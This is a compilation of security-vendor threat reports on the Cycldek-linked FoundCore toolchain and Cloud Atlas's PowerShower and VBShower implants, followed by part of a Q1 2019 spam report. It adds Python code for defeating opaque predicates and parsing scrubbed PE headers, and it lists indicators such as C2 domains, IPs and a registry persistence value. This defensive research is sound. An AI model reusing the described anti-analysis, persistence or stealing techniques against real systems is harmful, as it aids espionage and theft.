From a high-level perspective, the infection chain follows the expected execution flow:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nAfter being loaded by a legitimate component from Microsoft Outlook (FINDER.exe, MD5 [9F1D6B2D45F1173215439BCC4B00B6E3](<https://opentip.kaspersky.com/9F1D6B2D45F1173215439BCC4B00B6E3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)), outlib.dll (MD5 [F267B1D3B3E16BE366025B11176D2ECB](<https://opentip.kaspersky.com/F267B1D3B3E16BE366025B11176D2ECB/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)) hijacks the intended execution flow of the program to decode and run a shellcode placed in a binary file, rdmin.src (MD5 [DF46DA80909A6A641116CB90FA7B8258](<https://opentip.kaspersky.com/DF46DA80909A6A641116CB90FA7B8258/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)). Such shellcodes that we had seen so far, however, did not involve any form of obfuscation. So, it was a rather unpleasant surprise for us when we discovered the first instructions:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140032/Cycldek_02.png>)\n\nExperienced reverse-engineers will immediately recognize disassembler-desynchronizing constructs in the screenshot above. The conditional jumps placed at offsets 7 and 9 appear to land in the middle of an address (as evidenced by the label loc_B+1), which is highly atypical for well-behaved assembly code. Immediately after, we note the presence of a call instruction whose destination (highlighted in red) is identified as bogus by IDA Pro, and the code that follows doesn't make any sense.\n\nExplaining what is going on requires taking a step back and providing a bit of background about how disassemblers work. At the risk of oversimplifying, flow-oriented disassemblers make a number of assumptions when processing files. 
One of them is that, when they encounter a conditional jump, they start disassembling the "false" branch first, and come back to the "true" branch later on. This process is better evidenced by looking at the opcodes corresponding to the code displayed above, again starting from offset 7:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140052/Cycldek_03.png>)\n\nIt is now more obvious that there are two ways to interpret the code above: the disassembler can either start from "E8", or from "81" \u2013 by default, IDA will choose the latter: E8 is in fact the opcode for the call instruction. But astute readers will notice that "JLE" (jump if lower or equal) and "JG" (jump if greater) are opposite conditions: no matter what, one of those will always be true and as such the actual code, as seen by the CPU during the execution, will start with the byte "81". Such constructs are called [opaque predicates](<https://en.wikipedia.org/wiki/Opaque_predicate>), and this E8 byte in the middle was only added there in order to trick the disassembler.\n\nDefeating this trick is but a trivial matter for IDA Pro, as it is possible to manually correct the disassembling mistake. However, it was immediately obvious that the shellcode had been processed by an automated obfuscation tool. Opaque predicates, sometimes in multiples, and dead code were inserted between every single instruction of the program. In the end, cleaning up the program automatically was the only practical approach, and we did so by modifying an [existing script](<https://github.com/RolfRolles/FinSpyVM/>) for the FinSpy malware family created by the respected reverse-engineer Rolf Rolles.\n\nThis step allowed us to discover the shellcode's purpose: to decrypt and decompress the final payload, using a combination of RC4 and LZNT1. Even then, it turned out that the attackers had more tricks up their sleeve. 
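The JLE/JG construct described above can be recognised mechanically. The Python below is an added example, not code from the original post nor the Rolf Rolles FinSpy script the authors adapted: it scans raw x86 bytes for two consecutive short conditional jumps whose opcodes differ only in the lowest bit (that is how x86 encodes a condition and its negation, e.g. 0x7E JLE and 0x7F JG) and that share one target, reports the bytes between the second jump's fall-through and that target as unreachable junk, and NOPs the whole construct out so that a linear disassembler follows the same path the CPU does. The input bytes are constructed to mirror the layout in the screenshot (jumps at offsets 7 and 9, a stray E8 at 0xB, real code at 0xC); they are not the actual FoundCore shellcode, and the scan is a byte-level heuristic rather than a full disassembler.

```python
"""Detect and neutralise the 'Jcc X; Jncc X' opaque-predicate trick.

x86 short conditional jumps are encoded as 0x70..0x7F followed by a signed
8-bit displacement relative to the end of the 2-byte instruction.  Opcodes
0x7E (JLE) and 0x7F (JG) differ only in bit 0, and so does every other
condition/negated-condition pair (JB/JAE, JE/JNE, ...).  Two such jumps in a
row that land on the same address form an opaque predicate: one of them is
always taken, so whatever sits between the fall-through of the second jump
and the shared target is never executed and exists only to desynchronise a
flow-oriented disassembler.
"""

from dataclasses import dataclass
from typing import List

JCC_SHORT_MIN, JCC_SHORT_MAX = 0x70, 0x7F
NOP = 0x90


@dataclass(frozen=True)
class OpaquePredicate:
    first_jcc: int      # offset of the first conditional jump
    target: int         # shared jump target (start of the real code)
    junk_start: int     # first byte the CPU never executes
    junk_end: int       # one past the last junk byte (== target)


def _short_jcc_target(code: bytes, off: int) -> int:
    """Target of the 2-byte Jcc at `off`: next instruction + signed rel8."""
    rel8 = int.from_bytes(code[off + 1:off + 2], "little", signed=True)
    return off + 2 + rel8


def find_opaque_predicates(code: bytes) -> List[OpaquePredicate]:
    """Linear scan for complementary Jcc pairs sharing a target, with junk.

    Heuristic pre-pass over raw bytes: an immediate or displacement that
    happens to look like 0x70..0x7F could match, so run it on a region known
    to start at an instruction boundary, or re-check matches against a real
    disassembler's output.
    """
    found = []
    i = 0
    while i + 3 < len(code):
        op1, op2 = code[i], code[i + 2]
        complementary = JCC_SHORT_MIN <= op1 <= JCC_SHORT_MAX and op2 == (op1 ^ 1)
        if complementary:
            t1 = _short_jcc_target(code, i)
            t2 = _short_jcc_target(code, i + 2)
            fallthrough = i + 4
            if t1 == t2 and fallthrough < t1 <= len(code):
                found.append(OpaquePredicate(i, t1, fallthrough, t1))
                i = t1          # resume at the real code, skipping the junk
                continue
        i += 1
    return found


def neutralise(code: bytes) -> bytes:
    """Return a copy in which every opaque predicate and its junk is NOP'd.

    Overwriting both jumps and the dead bytes with NOPs keeps all offsets
    intact (later absolute references still resolve) while giving a linear
    disassembler a straight path to the real instruction stream.
    """
    patched = bytearray(code)
    for op in find_opaque_predicates(code):
        for off in range(op.first_jcc, op.junk_end):
            patched[off] = NOP
    return bytes(patched)


# Constructed sample (not the real shellcode): 7 NOPs, then
#   07: 7E 03   jle short 0x0C      (target = 0x09 + 3)
#   09: 7F 01   jg  short 0x0C      (target = 0x0B + 1 -> the 'loc_B+1' label)
#   0B: E8      junk byte: a linear disassembler reads it as the start of a CALL
#   0C: 81 C1 10 00 00 00   add ecx, 0x10   (the real next instruction)
SAMPLE = bytes([NOP] * 7) + bytes.fromhex("7E03 7F01 E8 81C110000000")


if __name__ == "__main__":
    for op in find_opaque_predicates(SAMPLE):
        print(f"opaque predicate at 0x{op.first_jcc:02X}: junk 0x{op.junk_start:02X}.."
              f"0x{op.junk_end - 1:02X}, real code resumes at 0x{op.target:02X}")
    print(neutralise(SAMPLE).hex(" "))
```

Patching with NOPs rather than deleting bytes keeps every offset stable, which matters once the surrounding code has been annotated. On real samples, run the pass on a region known to begin at an instruction boundary, since a 0x7E/0x7F byte inside an immediate or displacement would otherwise produce a false match.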
Normally, at this stage, one would have expected to find a PE file that the shellcode would load into memory. But instead, this is what we got:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140315/Cycldek_04.png>) \nThe recovered file was indeed a PE, but it turned out that most of its headers had been scrubbed. In fact, even the scarce ones remaining contained incoherent values \u2013 for instance, here, a number of declared sections equal to 0xAD4D. Since it is the shellcode (and not the Windows loader) that prepares this file for execution, it doesn't matter that some information, such as the magic numbers, is missing. As for the erroneous values, it turned out that the shellcode was fixing them on the fly using hardcoded operations:\n \n \n for ( i = 0; ; ++i ) // Iterate on the sections\n {\n // [...]\n // Stop when all sections have been read\n if ( i >= pe->pe_header_addr->FileHeader.NumberOfSections - 44361 )\n break;\n // [...]\n }\n\nFor instance, in the decompiled code above (as for all references to the file's number of sections) the value read in the headers is subtracted by 44361. For the attackers, the advantage is two-fold. First, it makes acquiring the final payload statically a lot more difficult for potential reverse-engineers. Second, it also ensures that the various components of the toolchain remain tightly coupled to each other. If only a single one of them finds itself uploaded to a multi-scanner website, it will be unexploitable for defenders. This is a design philosophy that we had observed from the LuckyMouse APT in the past, and is manifest in other parts of this toolchain too, as we will see later on. Eventually, we were able to reconstruct the file's headers and move on with our analysis \u2013 but we found this loader so interesting from an educational standpoint that we decided to base one track of our online reverse-engineering course on it. 
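The header fix-up can be reproduced on a constructed buffer. The Python below is an added example, not code from the original post or from the loader itself: it builds a minimal PE-style header with the 'MZ' and 'PE\0\0' signatures zeroed and NumberOfSections pre-biased the way the decompiled loop expects (the 0xAD4D in the screenshot is decimal 44365, and 44365 - 44361 = 4), then shows that a loader-faithful parse that skips the magic checks and subtracts the constant recovers 4 sections, while a strict parser rejects the same bytes. Field names and offsets follow the PE/COFF specification; the sample header is constructed, not taken from a real file.

```python
"""Parse a PE file header scrubbed the way the FoundCore loader expects,
and undo its hardcoded fix-up.

Layout (little-endian), from the PE/COFF specification:
  DOS header:  'MZ' at 0x00 ... e_lfanew (uint32) at 0x3C
  NT headers:  'PE\\0\\0' signature, then IMAGE_FILE_HEADER:
      Machine (u16), NumberOfSections (u16), TimeDateStamp (u32),
      PointerToSymbolTable (u32), NumberOfSymbols (u32),
      SizeOfOptionalHeader (u16), Characteristics (u16)
"""

import struct
from typing import NamedTuple

# The constant subtracted by the decompiled loop quoted in the post.
SECTION_COUNT_FIXUP = 44361
FILE_HEADER_FMT = "<HHIIIHH"          # IMAGE_FILE_HEADER, 20 bytes
MAX_SECTIONS = 96                     # limit enforced by the Windows loader


class FileHeader(NamedTuple):
    machine: int
    number_of_sections: int
    time_date_stamp: int
    pointer_to_symbol_table: int
    number_of_symbols: int
    size_of_optional_header: int
    characteristics: int


def parse_file_header(buf: bytes, require_magic: bool = True) -> FileHeader:
    """Read IMAGE_FILE_HEADER via e_lfanew.

    With require_magic=True this behaves like a well-behaved parser and
    rejects a buffer without 'MZ' and 'PE\\0\\0'.  The shellcode never checks
    those bytes, so a loader-faithful parse passes require_magic=False.
    """
    if len(buf) < 0x40:
        raise ValueError("buffer too small for a DOS header")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if require_magic:
        if buf[:2] != b"MZ":
            raise ValueError("missing MZ signature")
        if buf[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
            raise ValueError("missing PE signature")
    fields = struct.unpack_from(FILE_HEADER_FMT, buf, e_lfanew + 4)
    return FileHeader(*fields)


def corrected_section_count(raw: int, fixup: int = SECTION_COUNT_FIXUP) -> int:
    """Apply the loader's fix-up: stored value minus the hardcoded constant.

    A corrected value outside 0..MAX_SECTIONS means the buffer was not
    prepared for this particular build of the shellcode (or the recovered
    constant is wrong), so refuse rather than return garbage.
    """
    value = raw - fixup
    if not 0 <= value <= MAX_SECTIONS:
        raise ValueError(f"implausible section count after fix-up: {value}")
    return value


def build_scrubbed_header(real_sections: int, fixup: int = SECTION_COUNT_FIXUP) -> bytes:
    """Constructed test input (not a real sample): an 0x58-byte PE-like blob
    with both magic numbers zeroed and NumberOfSections pre-biased by `fixup`."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)                 # 'MZ' scrubbed to 00 00
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    nt_signature = b"\x00\x00\x00\x00"        # 'PE\0\0' scrubbed
    file_header = struct.pack(
        FILE_HEADER_FMT,
        0x014C,                                # IMAGE_FILE_MACHINE_I386
        real_sections + fixup,                 # 4 + 44361 == 0xAD4D
        0, 0, 0,                               # timestamp, symtab ptr, nsyms
        0xE0,                                  # SizeOfOptionalHeader (PE32)
        0x2102,                                # EXECUTABLE | 32BIT | DLL
    )
    return bytes(dos) + nt_signature + file_header


def recover_section_count(buf: bytes) -> int:
    """What the shellcode 'sees': no magic check, then subtract the constant."""
    hdr = parse_file_header(buf, require_magic=False)
    return corrected_section_count(hdr.number_of_sections)


if __name__ == "__main__":
    blob = build_scrubbed_header(real_sections=4)
    raw = parse_file_header(blob, require_magic=False).number_of_sections
    print(f"stored NumberOfSections = 0x{raw:04X} ({raw})")
    print(f"after fix-up            = {recover_section_count(blob)}")
    try:
        parse_file_header(blob)               # a strict parser gives up here
    except ValueError as exc:
        print(f"strict parser: {exc}")
```

The plausibility bound in `corrected_section_count` is the check a practitioner wants when applying a recovered constant to an unknown buffer: if the subtraction does not land in the range the Windows loader itself accepts, the blob was prepared for a different build of the shellcode and the constant should not be trusted.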
For more detailed steps on how we approached this sample, please have a look at [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>).\n\n## FoundCore payload\n\nThe final payload is a remote administration tool that provides its operators with full control over the victim machine. Upon execution, this malware starts four threads:\n\n * The first one establishes persistence by creating a service.\n * The second one sets inconspicuous information for the service by changing its "Description", "ImagePath" and "DisplayName" fields (among others).\n * The third sets an empty DACL (corresponding to the SDDL string "D:P") on the image file associated with the current process in order to prevent access to the underlying malicious file. Unlike a NULL DACL, which grants everyone access, an empty protected DACL grants no one access, so an analyst collecting the file first has to take ownership of it (or use backup privileges).\n * Finally, a worker thread bootstraps execution and establishes a connection with the C2 server. Depending on its configuration, it may also inject a copy of itself into another process.\n\nCommunications with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS. Commands supported by FoundCore include filesystem manipulation, process manipulation, screenshot capture and arbitrary command execution.\n\n## RoyalRoad documents, DropPhone and CoreLoader\n\nTaking a step back from the FoundCore malware family, we looked into the various victims we were able to identify to try to gather information about the infection process. In the vast majority of the incidents we discovered, it turned out that FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com. They were all generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempt to exploit CVE-2018-0802.\n\nInterestingly, while we would have expected them to contain decoy content, all of them were blank. 
We, therefore, hypothesize the existence of precursor documents, possibly delivered through spear-phishing, or precursor infections, which would trigger the download of one of these RTF files.\n\nSuccessful exploitation leads to the deployment of yet another malware that we named DropPhone:\n\n**MD5** | 6E36369BF89916ABA49ECA3AF59D38C6 \n---|--- \n**SHA1** | C477B50AE66E7228164930117A7D36C53713A5F2 \n**SHA256** | F50AE4B25B891E95B57BD4391AEB629437A43664034630D593EB9846CADC9266 \n**Creation time** | 2020-11-04 09:14:22 \n**File type** | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows \n**File size** | 56 KB \n \nThis C++ implant also comes in the form of a legitimate executable (DeElevate.exe, from the publisher StarDock) and a side-loaded DLL (DeElevator.dll). At this stage, we are left with more questions than answers when it comes to it. DropPhone fetches a file saved as data.dat from hxxps://cloud.cutepaty[.]com, but we were unable to obtain a copy of this file so far. Next, it expects to find a companion program in %AppData%\\Microsoft\\Installers\\sdclt.exe, and will eventually terminate execution if it cannot find it.\n\nOur hypothesis is that this last file could be an instance or variant of CoreLoader (which we will describe in a minute), but the only piece of data supporting this theory that we have at our disposal is that we found CoreLoader in this folder in a single occurrence.\n\nDropPhone launches sdclt.exe, then collects environment information from the victim machine and sends it to DropBox. The last thing this implant does is delete data.dat without ever accessing its contents. 
We speculate that they are consumed by sdclt.exe, and that this is another way to lock together the execution of two components, frustrating the efforts of the reverse-engineers who are missing pieces of the puzzle \u2013 as is our case here.\n\n**MD5** | 1234A7AACAE14BDD94EEE6F44F7F4356 \n---|--- \n**SHA1** | 34977E351C9D0E9155C6E016669A4F085B462762 \n**SHA256** | 492D3B5BEB89C1ABF88FF866D200568E9CAD7BB299700AA29AB9004C32C7C805 \n**Creation time** | 2020-11-21 03:47:14 \n**File type** | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows \n**File size** | 66 KB \n \nFinally, CoreLoader, the last malware we found associated to this set of activity, is a simple shellcode loader which performs anti-analysis and loads additional code from a file named WsmRes.xsl. Again, this specific file eluded our attempts to catch it but we suspect it to be, one way or another, related to FoundCore (described in the previous section).\n\nOverall, our current understanding of this complex toolchain is as follows. Dashed lines represent the components and links we are inferring, striped boxes represent the files we could not acquire.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\n## Victimology and attribution\n\nWe observed this campaign between June 2020 and January 2021. According to our telemetry, dozens of organizations were affected. 80% of them are based in Vietnam and belong to the government or military sector, or are otherwise related to the health, diplomacy, education or political verticals. We also identified occasional targets in Central Asia and in Thailand.\n\nFor the reasons laid-out in the introduction, attribution based on tooling alone is risky when it comes to this nebula. At first glance, the use of a "triad", the general design philosophy and the obvious effort spent to make reverse-engineering as complex as possible are reminiscent of LuckyMouse. 
However, we also observed code similarities between CoreLoader or FoundCore and programs associated with the Cycldek threat actor – namely, RedCore Loader (MD5: [1B6BCBB38921CAF347DF0A21955771A6](<https://opentip.kaspersky.com/1B6BCBB38921CAF347DF0A21955771A6/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)).\n\nWhile Cycldek was, so far, considered to be one of the less sophisticated threat actors from the Chinese-speaking nexus, its targeting is known to be consistent with what we observed in this campaign. Therefore, we are linking the activities described in this post to Cycldek with low confidence.\n\n## Conclusion\n\nNo matter which group orchestrated this campaign, it constitutes a significant step up in terms of sophistication. The toolchain presented here was deliberately split into a series of interdependent components that function together as a whole. Single pieces are difficult – sometimes impossible – to analyze in isolation, because they rely on code or data provided at other stages of the infection chain. We regretfully admit that this strategy was partly successful in preventing us from obtaining a complete picture of this campaign. As such, this report is as much about the things we know as it is about figuring out what we don't. We hereby extend our hand to fellow researchers who might be seeing other pieces of this vast puzzle, because we strongly believe that the challenges ahead of us can only be overcome through information sharing among trusted industry partners.\n\nSome readers from other regions of the world might dismiss this local activity as irrelevant to their interests. We would advise them to take heed. Experience shows that regional threat actors sometimes widen their area of activity as their operational capabilities increase, and that tactics and tools are widely shared across distinct actors or intrusion sets that target different regions. Today, we see a group focused on South-East Asia taking a major leap forward. 
Tomorrow, they may decide they're ready to take on the whole world.\n\n## Indicators of Compromise\n\n**File Hashes**\n\n[F267B1D3B3E16BE366025B11176D2ECB](<https://opentip.kaspersky.com/F267B1D3B3E16BE366025B11176D2ECB/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore malicious DLL (outllib.dll) \n---|--- \n[DF46DA80909A6A641116CB90FA7B8258](<https://opentip.kaspersky.com/DF46DA80909A6A641116CB90FA7B8258/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore companion file (rdmin.src) \n[6E36369BF89916ABA49ECA3AF59D38C6](<https://opentip.kaspersky.com/6E36369BF89916ABA49ECA3AF59D38C6/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | DropPhone \n[60095B281E32DAD2B58A10005128B1C3](<https://opentip.kaspersky.com/60095B281E32DAD2B58A10005128B1C3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | Malicious RTF document \n[1234A7AACAE14BDD94EEE6F44F7F4356](<https://opentip.kaspersky.com/1234A7AACAE14BDD94EEE6F44F7F4356/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | CoreLoader \n \n**Domains**\n\n[phong.giaitrinuoc[.]com](<https://opentip.kaspersky.com/phong.giaitrinuoc.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore C2 \n---|--- \n[cloud.cutepaty[.]com](<https://opentip.kaspersky.com/cloud.cutepaty.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | DropPhone C2 \n[static.phongay[.]com](<https://opentip.kaspersky.com/static.phongay.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | RTF document stager \n \n_Source: "The leap of a Cycldek-related threat actor", Securelist, published 2021-04-05, <https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/>_\n\nAlso known as Inception, Cloud Atlas is an actor that has 
a long history of cyber-espionage operations targeting industries and governmental entities. We first reported [Cloud Atlas in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and we've been following its activities ever since.\n\nFrom the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor, mostly focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/09151317/Recent-Cloud-Atlas-activity-1.png>)\n\n**Countries targeted by Cloud Atlas recently**\n\nCloud Atlas hasn't changed its TTPs (tactics, techniques and procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high-value targets.\n\nThe Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high-profile victims. These emails are crafted with Office documents that use malicious remote templates, whitelisted per victim, hosted on remote servers. We [described one of the techniques used by Cloud Atlas in 2017](<https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/>) and our colleagues at [Palo Alto Networks also wrote about it in November 2018](<https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/>).\n\nPreviously, Cloud Atlas dropped its "validator" implant, named "PowerShower", directly after exploiting the Microsoft Equation Editor vulnerability (CVE-2017-11882) combined with CVE-2018-0802. 
During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second-stage modular backdoor that we disclosed [five years ago in our first blog post about them](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>) and which remains unchanged.\n\n## Let's meet PowerShower\n\nPowerShower, named and previously disclosed by Palo Alto Networks in their blog post (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used by Cloud Atlas since October 2018, first as a validator and now as a second stage. The differences between the two versions reside mostly in the anti-forensics features of the validator version of PowerShower.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084702/20190808_Infographics_Cloud_Atlas_Schema_2-5.png>)\n\nThe PowerShower backdoor - even in its later developments - dispatches on the first byte of the content it receives from the C2 and distinguishes three cases:\n\n**First byte** | **Description** \n---|--- \n0x50 (ASCII "P", decimal 80) | The first byte of the ZIP magic "PK". The implant saves the received content as a ZIP archive under %TEMP%\\PG.zip. \n0x4F (ASCII "O", decimal 79) | The first byte of a VBS script starting with "On Error Resume Next". The implant saves the received content as a VBS script under "%APPDATA%\\Microsoft\\Word\\[A-Za-z]{4}.vbs" and executes it with Wscript.exe. \nDefault | If the first byte is neither "P" nor "O", the content is saved as an XML file under "%TEMP%\\temp.xml". The script then loads the file, parses the XML to get the PowerShell commands to execute, decodes them from Base64 and invokes IEX. \n \nAfter executing the commands, the script deletes "%TEMP%\\temp.xml" and sends the content of "%TEMP%\\pass.txt" to the C2 via an HTTP POST request. 

A few modules deployed by PowerShower have been seen in the wild, such as:

 * A PowerShell document stealer module which uses 7zip (present in the received PG.zip) to pack and exfiltrate *.txt, *.pdf, *.xls or *.doc documents smaller than 5MB that were modified during the last two days;
 * A reconnaissance module which retrieves a list of the active processes, the current user and the current Windows domain. Interestingly, this feature is present in PowerShower, but the condition leading to its execution is never met in the recent versions of PowerShower;
 * A password stealer module which uses the open-source tool LaZagne to retrieve passwords from the infected system.

We have not yet seen a VBS module dropped by this implant in the wild, but we believe that one of the VBS scripts PowerShower can drop is a dropper for the group's second-stage backdoor documented in our [article back in 2014](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).

## And its new friend, VBShower

During its recent campaigns, Cloud Atlas used a new "polymorphic" infection chain that no longer relies on PowerShower directly after infection. Instead, it executes a polymorphic HTA hosted on a remote server, which drops three different files on the local system:

 * A backdoor that we name **VBShower**, which is polymorphic and replaces PowerShower as a validator;
 * A tiny launcher for VBShower;
 * A file computed by the HTA which contains contextual data such as the current user, domain, computer name and a list of active processes.

This "polymorphic" infection chain is the attacker's attempt to defeat IoC-based defence: each sample is unique per victim, so it cannot be hunted by file hash on the host.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/12084643/20190808_Infographics_Cloud_Atlas_Schema_2.png>)

The VBShower backdoor has the same philosophy as the validator version of PowerShower.
Its aim is to complicate forensic analysis by trying to delete all the files contained in "%APPDATA%\..\Local\Temporary Internet Files\Content.Word" and "%APPDATA%\..\Local Settings\Temporary Internet Files\Content.Word\".

Once these files have been deleted and persistence has been achieved in the registry, VBShower sends the context file computed by the HTA to the remote server and, every hour, tries to fetch a VBS script from the remote server over HTTP and execute it.

At the time of writing, two VBS files have been seen pushed to the target computer by VBShower. The first one is an installer for PowerShower and the second one is an installer for the Cloud Atlas second-stage modular backdoor, which communicates with a cloud storage service via WebDAV.

## Final words

Cloud Atlas remains very prolific in Eastern Europe and Central Asia. The actor's massive spear-phishing campaigns continue to use its simple but effective methods in order to compromise its targets.

Unlike many other intrusion sets, Cloud Atlas has not adopted open-source implants in its recent campaigns, a choice other actors make in order to be harder to distinguish.
More interestingly, this intrusion set has not changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).

## IoCs

#### Some emails used by the attackers

 * infocentre.gov@mail.ru
 * middleeasteye@asia.com
 * simbf2019@mail.ru
 * world_overview@politician.com
 * infocentre.gov@bk.ru

#### VBShower registry persistence

 * Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[a-f0-9A-F]{8}
 * Value: wscript //B "%APPDATA%\[A-Za-z]{5}.vbs"

#### VBShower paths

 * %APPDATA%\[A-Za-z]{5}.vbs.dat
 * %APPDATA%\[A-Za-z]{5}.vbs
 * %APPDATA%\[A-Za-z]{5}.mds

#### VBShower C2s

 * 176.31.59.232
 * 144.217.174.57

_Source: "Recent Cloud Atlas activity", Securelist, published 2019-08-12, https://securelist.com/recent-cloud-atlas-activity/92016/ (CVEs referenced: CVE-2017-11882, CVE-2018-0802)._

## Quarterly highlights

### Valentine's Day

As per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information, such as bank card details, out of starry-eyed users. The topics exploited by cybercriminals ranged from online flower shops to dating sites.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)

But most often, users were invited to order gifts for loved ones and buy medications such as Viagra.
Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)

### New Apple products

Late March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.

_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)

_Fake Apple ID login pages_

Scammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)

### Fake technical support

Fake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and on social networks.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)

_Fake "Kaspersky Lab support service" accounts_

All the profiles of this kind that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company's products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free.
Not only do users not have their issue resolved, they are likely to be defrauded as well.

### New Instagram "features"

Last year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full: not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.

Cybercriminal advertisers use the same methods to lure victims, promising products or services at what seems a great price.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)

As usual in such schemes, the "buyer" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)

### Mailshot phishing

In Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information.
Sometimes fake domains were used with names similar to those of real services, while at other times hacked sites redirected the victim to a fake authorization form.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)

### Financial spam through the ACH system

In Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)

### "Dream job" offers from spammers

In Q3 2018, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing "dream job" offers. This quarter, we logged another major mailing topic: messages sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the "cloud service," the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing).
If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)

### Ransomware and cryptocurrency

As we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of "sextortion", a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).

